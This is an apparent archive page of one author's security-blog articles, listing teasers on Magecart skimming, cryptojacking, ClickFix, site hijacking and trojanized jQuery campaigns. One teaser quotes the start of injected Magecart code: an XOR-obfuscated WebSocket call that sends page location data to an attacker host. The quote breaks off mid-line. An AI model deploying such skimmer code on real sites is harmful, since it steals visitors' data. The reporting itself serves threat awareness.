Articles by Himanshu Anand
CryptoJacking is dead: long live CryptoJacking
Modern cryptojacking has evolved into a silent, multi-stage attack.
Magecart targeting East Asian e-commerce websites on OpenCart
We’ve detected a Magecart-style attack targeting the OpenCart CMS platform
How traffic hijacking and affiliate fraud can harm websites and users
Traffic hijacking is when someone secretly changes where a website’s links go, sending visitors to other sites.
Is relying on Indicators of Compromise secure enough?
Most security programs today still rely heavily on Indicators of Compromise (IOCs). This approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.
CoinMarketCap Client-Side Attack: A Comprehensive Analysis
On June 20, 2025, CoinMarketCap (CMC) - a cornerstone of the cryptocurrency ecosystem, relied upon by millions for real-time crypto data - experienced a significant security incident.
Weaponized Google OAuth Triggers Malicious WebSocket
An attacker is using ‘Google.com’ to deliver and execute their own code in a weaponized Google OAuth attack.
Ruthless Client-Side Attacks Targeting Multiple Platforms with ClickFix
In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.
Chinese Adult Scam Targets Mobile Users Through PWA
We’ve identified a fresh injection campaign abusing third-party JavaScript to redirect users.
Over 150K websites hit by full-page hijack linking to Chinese gambling sites
We estimate that approximately 150,000 websites have been impacted by this campaign. The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese.
Thousands of websites hit by four backdoors in 3rd party JavaScript attack
While analyzing threats targeting WordPress frameworks, we found an attack where a single 3rd party JavaScript file was used to inject four separate backdoors into 1,000 compromised websites using cdn.csyndication[.]com/.
Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam
A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user’s browser window—often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.
10,000 WordPress Websites Found Delivering MacOS and Windows Malware
We identified over 10,000 WordPress websites showing a fake Google browser update that leads to malware downloads.
Government and university websites targeted in ScriptAPI[.]dev client-side attack
Yesterday we discovered another client-side JavaScript attack targeting 500+ websites, including governments and universities. The injected scripts create hidden links, pointing to external websites, in the Document Object Model (DOM), a programming interface for web documents.
The cost of false positives - how we became a target
This week, we identified an intriguing use case involving the WP3[.]XYZ attack (link to our blog post). It sparked interest across the community and led to better detection rates on platforms like VirusTotal (VirusTotal link). While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. Despite this, we aim to make the community aware of potential attacks and promise to do even better in the future. When fals
Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack
We’ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: "https://wp3.xyz/plugin[.]php".
New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com
This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it successfully identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here's a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a
New Magecart attack code revealed
On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Kuwait ecommerce site is being used to facilitate client-side skimming attacks
A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection,
Cisco client-side Magecart JavaScript attack
Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being
Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs
Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery